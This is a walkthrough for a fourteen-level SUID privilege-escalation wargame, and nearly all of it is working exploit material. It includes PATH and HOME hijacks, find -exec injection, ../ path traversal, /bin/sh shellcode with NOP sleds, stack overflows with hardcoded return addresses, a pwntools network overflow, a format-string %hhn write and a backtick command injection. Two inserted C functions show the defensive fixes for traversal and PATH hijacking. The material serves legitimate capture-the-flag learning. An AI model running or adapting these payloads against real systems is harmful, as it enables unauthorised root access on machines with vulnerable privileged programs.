All challenges are under /var/challenge/levelN, where N is the level number, starting from 1. All challenge binaries are SUID programs. Your goal is to run each challenge binary, exploit it, get a shell, and then execute l33t to elevate yourself to the next level. You must start from level 1.
//level1 exploit
cd to /var/challenge/level1 and run the following command
export HOME="/var/challenge/level1"
You get a bash shell ($)
Run l33t and move to level2
//level2 exploit
Create a file called tidy
Then change the PATH variable to your directory
PATH=/home/gooner:$PATH
Change the permissions for tidy using
chmod +x tidy
Put l33t in tidy and save the file
Then from /var/challenge/level2 run
./2 /home/gooner/tidy
The output should say OK! Move to challenge 3
//level3 exploit
Put this in a script and run the file with ./file_name
#!/bin/bash
/var/challenge/level3/3 'level3.sh -exec l33t {} +'
//level4 exploit
Put this in a script and run the file with ./file_name
#!/bin/bash
/var/challenge/level4/4 '../../../../../usr/local/bin/l33t'
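
The level4 argument relies on ../ sequences walking out of the directory the program expects. As an added example (not the challenge's code, which is not shown on this page), this C helper shows the check that closes that bug class: canonicalize the joined path first, then require the result to stay under the base directory. The function name and the /usr base used in main are assumptions for the demo.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700   /* for realpath() under strict -std= modes */
#endif
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical helper: resolve base_dir/name and accept it only if the
 * canonical result is still inside base_dir. out must hold PATH_MAX bytes.
 * Returns 0 on success, -1 if the path escapes, is too long or does not exist. */
int resolve_inside(const char *base_dir, const char *name, char *out)
{
    char base[PATH_MAX], joined[PATH_MAX];

    if (realpath(base_dir, base) == NULL)
        return -1;
    int len = snprintf(joined, sizeof joined, "%s/%s", base, name);
    if (len < 0 || (size_t)len >= sizeof joined)
        return -1;
    /* realpath() collapses "..", "." and symlinks into one absolute path. */
    if (realpath(joined, out) == NULL)
        return -1;
    /* Compare against "<base>/" so that /usr does not also match /usrlocal. */
    size_t n = strlen(base);
    if (strncmp(out, base, n) != 0 || out[n] != '/')
        return -1;
    return 0;
}

int main(void)
{
    /* Constructed inputs: one benign name and the ../ shape used in level4. */
    const char *names[] = { "bin", "../../../../../etc/passwd" };
    char out[PATH_MAX];

    for (size_t i = 0; i < sizeof names / sizeof names[0]; i++) {
        if (resolve_inside("/usr", names[i], out) == 0)
            printf("allowed:  %s\n", out);
        else
            printf("rejected: %s\n", names[i]);
    }
    return 0;
}
```
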
//level5 exploit
Run this command
export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
Create a file in default location with this code
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]) {
    char *ptr = getenv("SHELLCODE");  /* address of the SHELLCODE variable */
    printf("%p\n", (void *)ptr);
    return 0;
}
Compile it using
gcc -m32 filename.c -o output
Run ./output (an address will get generated 0x...) and copy the address.
Then go to level5 and run
./5 11
Run l33t in the bash shell to move to the next level
//level6 exploit
Run this command from level6
./6 uniq $(python -c 'print "A"*256 + "l33t"')
This moves you to the next level
//level7 exploit
Create a file called ls in default location
Then change the PATH variable to your directory
export PATH=/home/gooner:$PATH
Change the permissions for ls using
chmod +x ls
Put l33t in ls and save the file
Then from /var/challenge/level7 run
./7 7.cmd
The output should list all the files! Move to challenge 8
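
Levels 2 and 7 both depend on the SUID program finding tidy or ls through the caller's PATH. As an added example (not the challenges' code, which is not shown on this page), this is the hardened way for a privileged C program to launch a helper: resolve the bare name against a compiled-in directory list and exec it with a fixed environment. TRUSTED_DIRS, CLEAN_ENV and both function names are assumptions.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700   /* for setenv() under strict -std= modes */
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Assumed vulnerable pattern: system("ls") or execvp("ls", ...) searches the
 * caller's PATH, so a writable directory placed first wins. */

/* Fixed search list compiled into the program; the caller's PATH is never read. */
static const char *const TRUSTED_DIRS[] = { "/usr/bin", "/bin", NULL };
/* Minimal environment handed to the child instead of the inherited one. */
static char *const CLEAN_ENV[] = { "PATH=/usr/bin:/bin", NULL };

/* Resolve a bare command name to an absolute path in TRUSTED_DIRS.
 * Returns 0 and fills out on success, -1 otherwise. */
int resolve_trusted(const char *cmd, char *out, size_t outlen)
{
    if (cmd[0] == '\0' || strchr(cmd, '/') != NULL)
        return -1;                      /* bare names only, no paths */
    for (size_t i = 0; TRUSTED_DIRS[i] != NULL; i++) {
        int n = snprintf(out, outlen, "%s/%s", TRUSTED_DIRS[i], cmd);
        if (n > 0 && (size_t)n < outlen && access(out, X_OK) == 0)
            return 0;
    }
    return -1;
}

/* Replace the process image with the trusted binary; returns only on failure. */
int exec_trusted(const char *cmd, char *const argv[])
{
    char path[4096];
    if (resolve_trusted(cmd, path, sizeof path) != 0)
        return -1;
    return execve(path, argv, CLEAN_ENV);
}

int main(void)
{
    char path[4096];
    setenv("PATH", "/home/gooner", 1);  /* the PATH change from the walkthrough */
    if (resolve_trusted("ls", path, sizeof path) == 0)
        printf("ls resolves to %s regardless of PATH\n", path);
    return 0;
}
```
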
//level8 exploit
Run the following command from /home/gooner
export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
Create a python file in default location with the following code
from pwn import *

fill_len = 0x10004+4
target = 0xffffd140

p = process(argv=['/var/challenge/level8/8', '-p', '2020'])
# Uses TCP by default
c = remote('127.0.0.1', 2020)

print c.readuntil('Ready to read!')
c.send('A'*fill_len + p32(target) + '\n')
c.readuntil('Done!')
c.sendline('l33t; touch success;')
print c.recvall(timeout=2)
Run the python file. Move to level9
//level9 exploit
Create a python file in default location
Have the data as follows
#!/usr/bin/env python
import base64
from pwn import *

code = 'kJCQ'*341
code = code+'k'+'Lv/L3NowesIU2gvYmluieMxyTHSMcCwC82AicOwAc2A6/4='
sc = base64.b64decode(code)
env = {}
env['__SC'] = sc
for i in range(5):
    env[chr(ord('A')+i)*(19)] = p32(0xffffdc01)*2
p = process(executable='/var/challenge/level9/9', argv=[], env=env)
p.sendline("l33t;exit")
print p.recvall()
Run the file and move to level 10
//level10 exploit
Run the following command from default location
export SHELLCODE=$(python -c 'print"\x90"*1000 + "\x31\xc0\x50\x68\x6c\x33\x33\x74\x68\x62\x69\x6e\x2f\x68\x63\x61\x6c\x2f\x68\x72\x2f\x6c\x6f\x68\x2f\x2f\x75\x73\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80"')
Go to /var/challenge/level10 and run
./10
//level11 exploit
Run the following code from default location
export SHELLCODE=$(python -c 'print"\x90"*1000 + "\x31\xc0\x50\x68\x6c\x33\x33\x74\x68\x62\x69\x6e\x2f\x68\x63\x61\x6c\x2f\x68\x72\x2f\x6c\x6f\x68\x2f\x2f\x75\x73\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80"')
Create a file level11.sh in default location with data
#!/bin/bash
/var/challenge/level11/11 `python -c 'print "B"*270+"\xe8\xd6\xff\xff"+"A"*32768'`
abc
Give permissions and make it executable
chmod +x level11.sh
Run level11.sh to move to level12
//level12 exploit
Run from default location
export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
Then from /var/challenge/level12
./12 `python -c 'print "aa\xeb\x9b\x04\x08\xea\x9b\x04\x08\xe9\x9b\x04\x08\xe8\x9b\x04\x08"+"%231x%70\$hhn%255x%71\$hhn%71\$hhn"'`
//level13 exploit
Run from default location shell
Create a bash file called level13.sh with the following contents and make it executable
#!/bin/bash
export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
/var/challenge/level13/13 gooner `python -c 'print "\xe8\xd6\xff\xff"*64'`
From /var/challenge/level13 run
/home/gooner/level13.sh
//level14 exploit
export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
Create shell_open.sh file with the following contents and make it executable
#!/bin/bash
l33t
Create level14.sh file and have the following contents
#!/bin/bash
export SHELLCODE=$(python -c 'print "\x90"*100000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')
/var/challenge/level14/14 moresecrets shell_open &
sleep 1
sh -c "find ~ -group lev15 -name ".*"
'`l33t`'"
From default location run
./level14.sh
Move to level 15